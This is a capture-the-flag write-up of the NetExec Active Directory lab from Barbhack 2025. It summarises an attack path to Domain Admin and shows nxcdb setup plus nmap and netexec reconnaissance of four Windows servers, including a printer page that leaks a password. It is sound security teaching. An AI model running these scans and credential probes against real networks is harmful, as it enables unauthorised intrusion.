Members of the NetExec team created a small lab as a CTF for the Barbhack conference that took place in August 2025 in the South of France. There are four Windows servers on an Active Directory domain. I’ll find a leaked password on a printer webpage to get access to print jobs where I find initial passwords, some of which still work. I’ll use that to get into the domain, coercing an authentication that I can relay into RBCD to get a ticket at admin on the webserver. I’ll decrypt a saved password on that machine to get access to a new SMB share where I’ll find a GMSA credential in a file. That user can abuse impersonation in the MSSQL database to become sa, where I’ll abuse SeImpersonatePrivilege to get SYSTEM on the DB server. That server has constrained delegation over another, whi…
Members of the NetExec team created a small lab as a CTF for the Barbhack conference that took place in August 2025 in the South of France. There are four Windows servers on an Active Directory domain. I’ll find a leaked password on a printer webpage to get access to print jobs where I find initial passwords, some of which still work. I’ll use that to get into the domain, coercing an authentication that I can relay into RBCD to get a ticket at admin on the webserver. I’ll decrypt a saved password on that machine to get access to a new SMB share where I’ll find a GMSA credential in a file. That user can abuse impersonation in the MSSQL database to become sa, where I’ll abuse SeImpersonatePrivilege to get SYSTEM on the DB server. That server has constrained delegation over another, which I’ll abuse with RBCD to get there, and find a backup of ntds.dit. None of the hashes are still good, but a comment on a user provides the domain admin password and completely owns the domain.
Lab Details
Date 30 Aug 2025
Creators
mpgn mael91620
Hosts
BLACKPEARLJOLLYROGERQUEENREVFLYINGDUTCHMAN
Description Welcome to the NetExec Active Directory Lab! This lab is designed to teach you how to exploit Active Directory (AD) environments using the powerful tool NetExec. Originally featured in the Barbhack 2025 CTF, this lab is now available for free to everyone! In this lab, you’ll explore how to use the powerful tool NetExec to efficiently compromise an Active Directory domain during an internal pentest. The ultimate goal? Become Domain Administrator by following various attack paths! Ahoy, matey! Time to conquer the Seven Seas and claim the PIRATES.BRB domain!
Background
Lab
The CTF starting documentation describes a lab with the domain PIRATES.BRB, with four servers:
- BLACKPEARL (192.168.10.10) - Domain Controller
- JOLLYROGER (192.168.10.11) - Web Application Server (Caddy on port 8080)
- QUEENREV (192.168.10.12) - MSSQL Server
- FLYINGDUTCHMAN (192.168.10.13) - Windows Server with NTDS backup
My setup is actually in the 10.2.10.0/24 IP range. My attack VM is 10.2.10.99.
It also gives an Attack Path Summary
- Initial Enumeration - Identify servers and services
- Web Application - Find credentials on the printer web interface
- Flag 1 - User’s descriptions
- Flag 2 - SMB share access
- Flag 3 - Group Policy Preferences
- Flag 4 - NTLMv1 relay to LDAP + SPN-less RBCD
- Flag 5 - DPAPI for local account
- Flag 6 - GMSA offline recovery + MSSQL impersonation
- Flag 7 - MSSQL command execution + S4U2Self privilege escalation
- Flag 8 - Kerberos Constrained Delegation without Protocol Transition
- Flag 9 - NTDS backup forensics → Domain Admin
I’m not going to read that too closely, but it will provide guidance on where to look next should I get stuck.
netexec Setup
Default Workspace
I’m going to be using the NetExec workspaces feature for this lab. To start, I’ll drop into nxcdb and show there is currently only the default workspace:
oxdf@hacky$ nxcdb
(Cmd) workspace list
[*] Enumerating Workspaces
default
I can check out the default workspace:
(Cmd) workspace default
nxcdb (default) >
Then I need to pick a protocol (only smb, mssql, and winrm are supported at this point). I’ll use winrm:
nxcdb (default) > proto winrm
nxcdb (default)(winrm) > help
Documented commands (type help <topic>):
========================================
clear_database creds exit export help hosts
Undocumented commands:
======================
back import
nxcdb (default)(winrm) >
One option is to list creds:
nxcdb (default)(winrm) > creds
+Credentials---------+-----------+-----------------+-------------------+----------------------------------+
| CredID | Admin On | CredType | Domain | UserName | Password |
+--------+-----------+-----------+-----------------+-------------------+----------------------------------+
| 1 | 1 Host(s) | plaintext | INFILTRATOR | winrm_svc | <redacted> |
| 2 | 1 Host(s) | plaintext | CICADA | emily.oscars | <redacted> |
...[snip]...
+--------+-----------+-----------+-----------------+-------------------+----------------------------------+
This is important to know about, as if this database collects real credentials during some kind of legit engagement, I want to know to clean them out once I’m done.
Create Workspace
For this lab, I want a unique workspace, so I’ll create one:
nxcdb (default) > workspace create pirates.brb
[*] Creating workspace 'pirates.brb'
[*] Creating pirates.brb workspace
[*] Initializing RDP protocol database
[*] Initializing SMB protocol database
[*] Initializing VNC protocol database
[*] Initializing SSH protocol database
[*] Initializing FTP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing LDAP protocol database
[*] Initializing WINRM protocol database
[*] Initializing WMI protocol database
[*] Initializing NFS protocol database
nxcdb (pirates.brb) >
This creates a new directory in ~/.nxc/workspaces with a handful of SQLite files:
oxdf@hacky$ ls ~/.nxc/workspaces/
default pirates.brb
oxdf@hacky$ ls ~/.nxc/workspaces/*
/home/oxdf/.nxc/workspaces/default:
ftp.db ldap.db mssql.db nfs.db rdp.db smb.db ssh.db vnc.db winrm.db wmi.db
/home/oxdf/.nxc/workspaces/pirates.brb:
ftp.db ldap.db mssql.db nfs.db rdp.db smb.db ssh.db vnc.db winrm.db wmi.db
Should I want to remove a workspace, rm -rf ~/.nxc/workspaces/<name> is the only way I know of.
Creating the workspace made it active. I can switch using the workspace command:
nxcdb (pirates.brb) > workspace default
nxcdb (default) > workspace pirates.brb
nxcdb (pirates.brb) >
Whatever is active when I exit here will collect information from netexec when it’s run.
Recon
Network
While the documentation gives a bit more information about the servers, I’m going to start with just the class C of 10.2.10.0/24. I’ll start with a simple ping sweep:
oxdf@hacky$ for i in {1..254}; do (ping -c 1 10.2.10.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
64 bytes from 10.2.10.10: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.11: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.12: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.13: icmp_seq=1 ttl=127 time=109 ms
64 bytes from 10.2.10.99: icmp_seq=1 ttl=64 time=109 ms
64 bytes from 10.2.10.254: icmp_seq=1 ttl=63 time=109 ms
.99 is my VM, and .254 is out of scope for this challenge. I’ll focus on the four at .10 - .13.
netexec will find these same four hosts:
oxdf@hacky$ netexec smb 10.2.10.0/24
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
They are each Windows Server 2022. There’s a domain, pirates.brb. I’ll take this opportunity to generate hosts entries:
oxdf@hacky$ netexec smb 10.2.10.0/24 --generate-hosts-file hosts
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
oxdf@hacky$ cat hosts
10.2.10.12 QUEENREV.PIRATES.BRB QUEENREV
10.2.10.11 JOLLYROGER.PIRATES.BRB JOLLYROGER
10.2.10.10 BLACKPEARL.PIRATES.BRB PIRATES.BRB BLACKPEARL
10.2.10.13 FLYINGDUTCHMAN.PIRATES.BRB FLYINGDUTCHMAN
oxdf@hacky$ cat hosts /etc/hosts | sponge /etc/hosts
Now I can interact with the servers by hostname:
oxdf@hacky$ ping -c 1 blackpearl.pirates.brb
PING BLACKPEARL.PIRATES.BRB (10.2.10.10) 56(84) bytes of data.
64 bytes from BLACKPEARL.PIRATES.BRB (10.2.10.10): icmp_seq=1 ttl=127 time=111 ms
--- BLACKPEARL.PIRATES.BRB ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 110.844/110.844/110.844/0.000 ms
BLACKPEARL
nmap
nmap finds 28 open TCP ports on BLACKPEARL:
oxdf@hacky$ nmap -p- --min-rate 10000 -vvv 10.2.10.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 02:23 UTC
...[snip]...
Nmap scan report for 10.2.10.10
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2026-01-25 02:23:58 UTC for 7s
Not shown: 65507 closed tcp ports (reset)
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
57020/tcp open unknown syn-ack ttl 127
57023/tcp open unknown syn-ack ttl 127
57024/tcp open unknown syn-ack ttl 127
57029/tcp open unknown syn-ack ttl 127
64388/tcp open unknown syn-ack ttl 127
64412/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.30 seconds
Raw packets sent: 68914 (3.032MB) | Rcvd: 65689 (2.628MB)
oxdf@hacky$ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV 10.2.10.10
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 02:25 UTC
Nmap scan report for 10.2.10.10
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-25 02:25:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PIRATES.BRB0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PIRATES.BRB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: BLACKPEARL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: BLACKPEARL, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:aa:b0:9f (unknown)
| smb2-time:
| date: 2026-01-25T02:25:41
|_ start_date: N/A
|_clock-skew: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.78 seconds
The box shows many of the ports associated with a Windows Domain Controller. The domain is PIRATES.BRB, and the hostname is BLACKPEARL.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
nmap notes a clock skew of only 1 second, so I’m good to take actions that use Kerberos auth.
I could try to brute force usernames / passwords over Kerberos, but only come back to that if I get nothing on other hosts. When I find creds, I can connect BloodHound data and look to connect over WinRM.
SMB - TCP 445
I’ll check for open SMB shares, but not find any:
oxdf@hacky$ netexec smb blackpearl.pirates.brb --shares
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.10 445 BLACKPEARL [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
oxdf@hacky$ netexec smb blackpearl.pirates.brb -u guest -p '' --shares
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\guest: STATUS_ACCOUNT_DISABLED
oxdf@hacky$ netexec smb blackpearl.pirates.brb -u oxdf -p oxdf --shares
SMB 10.2.10.10 445 BLACKPEARL [*] Windows Server 2022 Build 20348 x64 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.2.10.10 445 BLACKPEARL [-] PIRATES.BRB\oxdf: STATUS_LOGON_FAILURE
I’ll note that SMB signing is enabled, which means I can’t relay SMB to this DC. I will see that LDAP does not have signing enabled:
oxdf@hacky$ netexec ldap blackpearl.pirates.brb
LDAP 10.2.10.10 389 BLACKPEARL [*] Windows Server 2022 Build 20348 (name:BLACKPEARL) (domain:PIRATES.BRB) (signing:None) (channel binding:No TLS cert)
netexec also shows null auth enabled for SMB, but that just means that a null session can be established, not that it provides useful access.
JOLLYROGER
nmap
nmap finds 17 open TCP ports on JOLLYROGER:
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.2.10.11
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 02:34 UTC
...[snip]...
Nmap scan report for 10.2.10.11
Host is up, received echo-reply ttl 127 (0.11s latency).
Scanned at 2026-01-25 02:34:50 UTC for 7s
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
8080/tcp open http-proxy syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49672/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.30 seconds
Raw packets sent: 69056 (3.038MB) | Rcvd: 65584 (2.623MB)
oxdf@hacky$ nmap -p 135,139,445,3389,5985,5986,8080 -sCV 10.2.10.11
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 02:35 UTC
Nmap scan report for 10.2.10.11
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: PIRATES
| NetBIOS_Domain_Name: PIRATES
| NetBIOS_Computer_Name: JOLLYROGER
| DNS_Domain_Name: PIRATES.BRB
| DNS_Computer_Name: JOLLYROGER.PIRATES.BRB
| DNS_Tree_Name: PIRATES.BRB
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-25T02:35:43+00:00
|_ssl-date: 2026-01-25T02:35:48+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=JOLLYROGER.PIRATES.BRB
| Not valid before: 2026-01-22T20:58:17
|_Not valid after: 2026-07-24T20:58:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=WIN2022-SRV-X64
| Subject Alternative Name: DNS:WIN2022-SRV-X64, DNS:WIN2022-SRV-X64
| Not valid before: 2025-11-21T05:59:37
|_Not valid after: 2035-11-19T05:59:37
|_ssl-date: TLS randomness does not represent time
8080/tcp open http Caddy httpd
|_http-title: HP LaserJet Pro M404n - Web Interface
|_http-server-header: Caddy
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-25T02:35:44
|_ start_date: N/A
|_nbstat: NetBIOS name: JOLLYROGER, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:58:2f:aa (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.35 seconds
The box shows ports typically associated with a Windows Client / Server. NetBIOS confirms the hostname JOLLYROGER.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
RDP and WinRM are both open should I find creds. There’s also SMB and a webserver on 8080 to enumerate further.
SMB - TCP 445
I’m not able to list SMB shares without valid creds here either:
oxdf@hacky$ netexec smb jollyroger.pirates.brb --shares
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [-] Error enumerating shares: [Errno 32] Broken pipe
oxdf@hacky$ netexec smb jollyroger.pirates.brb -u guest -p '' --shares
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [-] PIRATES.BRB\guest: STATUS_ACCOUNT_DISABLED
oxdf@hacky$ netexec smb jollyroger.pirates.brb -u oxdf -p oxdf --shares
SMB 10.2.10.11 445 JOLLYROGER [*] Windows Server 2022 Build 20348 x64 (name:JOLLYROGER) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.11 445 JOLLYROGER [-] PIRATES.BRB\oxdf:oxdf STATUS_LOGON_FAILURE
SMB signing is disabled, which means this server would be vulnerable to a relay attack.
Web - TCP 8080
Visiting http://jollyroger.pirates.brb:8080/ shows the page for an HP LaserJet printer:
The Jobs tab has 50 jobs:
Some of these might be interesting to look at, but clicking on them says I don’t have sufficient access:
It does give a path to the document in /scan. If I try to visit /scan or /scan/doc_auto.pdf, it pops HTTP auth:
The Network tab can take Wi-Fi creds:
The Security tab is prefilled with the username admin and a password that’s hidden. If I look at the raw HTML, I’ll see that the value is present, “hplaserbarbhack”:
The Support tab has a form to request support:
QUEENREV
nmap
nmap finds 18 open TCP ports on QUEENREV:
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.2.10.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 13:44 UTC
...[snip]...
Nmap scan report for 10.2.10.12
Host is up, received reset ttl 127 (0.11s latency).
Scanned at 2026-01-25 13:44:43 UTC for 8s
Not shown: 65517 closed tcp ports (reset)
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49796/tcp open unknown syn-ack ttl 127
62888/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.76 seconds
Raw packets sent: 70459 (3.100MB) | Rcvd: 65889 (2.636MB)
oxdf@hacky$ nmap -p 135,139,445,1433,3389,5985,5986 -sCV 10.2.10.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 13:46 UTC
Nmap scan report for 10.2.10.12
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-01-25T13:46:47+00:00; +2s from scanner time.
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-23T21:09:59
|_Not valid after: 2056-01-23T21:09:59
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: PIRATES
| NetBIOS_Domain_Name: PIRATES
| NetBIOS_Computer_Name: QUEENREV
| DNS_Domain_Name: PIRATES.BRB
| DNS_Computer_Name: QUEENREV.PIRATES.BRB
| DNS_Tree_Name: PIRATES.BRB
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-25T13:46:40+00:00
| ssl-cert: Subject: commonName=QUEENREV.PIRATES.BRB
| Not valid before: 2026-01-22T20:58:17
|_Not valid after: 2026-07-24T20:58:17
|_ssl-date: 2026-01-25T13:46:47+00:00; +2s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=WIN2022-SRV-X64
| Subject Alternative Name: DNS:WIN2022-SRV-X64, DNS:WIN2022-SRV-X64
| Not valid before: 2025-11-21T05:59:37
|_Not valid after: 2035-11-19T05:59:37
|_http-title: Not Found
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-25T13:46:40
|_ start_date: N/A
|_nbstat: NetBIOS name: QUEENREV, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:4b:ad:20 (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.34 seconds
The box shows ports typically associated with a Windows Client / Server. NetBIOS confirms the hostname QUEENREV.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
MSSQL, RDP, and WinRM are all open should I find creds. There’s also SMB which could show something unauthenticated, but more likely I’ll need to come back once I have creds.
SMB - TCP 445
Just as with the other hosts, I’m not able to list SMB shares without valid creds here either:
oxdf@hacky$ netexec smb queenrev.pirates.brb --shares
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.12 445 QUEENREV [-] Error enumerating shares: [Errno 32] Broken pipe
oxdf@hacky$ netexec smb queenrev.pirates.brb -u guest -p '' --shares
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.12 445 QUEENREV [-] PIRATES.BRB\guest: STATUS_ACCOUNT_DISABLED
oxdf@hacky$ netexec smb queenrev.pirates.brb -u oxdf -p oxdf --shares
SMB 10.2.10.12 445 QUEENREV [*] Windows Server 2022 Build 20348 x64 (name:QUEENREV) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.12 445 QUEENREV [-] PIRATES.BRB\oxdf:oxdf STATUS_LOGON_FAILURE
SMB signing is disabled, which means this server would be vulnerable to a relay attack.
FLYINGDUTCHMAN
nmap
nmap finds 16 open TCP ports open on FLYINGDUTCHMAN:
oxdf@hacky$ nmap -p- -vvv --min-rate 10000 10.2.10.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 13:50 UTC
...[snip]...
Nmap scan report for 10.2.10.13
Host is up, received reset ttl 127 (0.11s latency).
Scanned at 2026-01-25 13:50:55 UTC for 7s
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
47001/tcp open winrm syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49665/tcp open unknown syn-ack ttl 127
49666/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49668/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
49670/tcp open unknown syn-ack ttl 127
49671/tcp open unknown syn-ack ttl 127
49672/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.31 seconds
Raw packets sent: 68896 (3.031MB) | Rcvd: 65604 (2.624MB)
oxdf@hacky$ nmap -p 135,139,445,3389,5985,5986 -sCV 10.2.10.13
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-25 13:51 UTC
Nmap scan report for 10.2.10.13
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-25T13:51:49+00:00; +2s from scanner time.
| rdp-ntlm-info:
| Target_Name: PIRATES
| NetBIOS_Domain_Name: PIRATES
| NetBIOS_Computer_Name: FLYINGDUTCHMAN
| DNS_Domain_Name: PIRATES.BRB
| DNS_Computer_Name: FLYINGDUTCHMAN.PIRATES.BRB
| DNS_Tree_Name: PIRATES.BRB
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-25T13:51:43+00:00
| ssl-cert: Subject: commonName=FLYINGDUTCHMAN.PIRATES.BRB
| Not valid before: 2026-01-22T20:58:17
|_Not valid after: 2026-07-24T20:58:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=WIN2022-SRV-X64
| Subject Alternative Name: DNS:WIN2022-SRV-X64, DNS:WIN2022-SRV-X64
| Not valid before: 2025-11-21T05:59:37
|_Not valid after: 2035-11-19T05:59:37
|_ssl-date: TLS randomness does not represent time
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time:
| date: 2026-01-25T13:51:44
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: FLYINGDUTCHMAN, NetBIOS user: <unknown>, NetBIOS MAC: bc:24:11:ee:a3:ee (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.61 seconds
The box shows ports typically associated with a Windows Client / Server. NetBIOS confirms the hostname FLYINGDUTCHMAN.
All of the ports show a TTL of 127, which matches the expected TTL for Windows one hop away.
RDP and WinRM are both open should I find creds. SMB could show something unauthenticated, but more likely I’ll need to come back once I have creds.
SMB - TCP 445
Just as with the other hosts, I’m not able to list SMB shares without valid creds on FLYINGDUTCHMAN either:
oxdf@hacky$ netexec smb flyingdutchman.pirates.brb --shares
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [-] Error enumerating shares: [Errno 32] Broken pipe
oxdf@hacky$ netexec smb flyingdutchman.pirates.brb -u guest -p '' --shares
SMB 10.2.10.13 445 FLYINGDUTCHMAN [*] Windows Server 2022 Build 20348 x64 (name:FLYINGDUTCHMAN) (domain:PIRATES.BRB) (signing:False) (SMBv1:None)
SMB 10.2.10.13 445 FLYINGDUTCHMAN [-] PIRATES.BRB\guest: STATUS_ACCOUNT_DISABLED
